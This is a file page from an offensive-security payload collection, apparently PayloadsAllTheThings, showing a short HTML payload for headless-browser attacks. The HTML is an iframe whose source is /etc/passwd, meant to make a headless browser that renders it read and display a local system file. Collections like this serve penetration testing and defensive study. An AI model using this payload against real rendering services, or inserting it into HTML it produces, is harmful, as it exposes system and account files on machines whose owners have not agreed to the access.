PayloadsAllTheThings/Headless Browser/files/iframe.html

5 lines
106 B
HTML
Raw Normal View History

2024-05-30 22:07:21 +00:00
<html>
<body>
<iframe src="/etc/passwd" height="640" width="640"></iframe>
</body>
</html>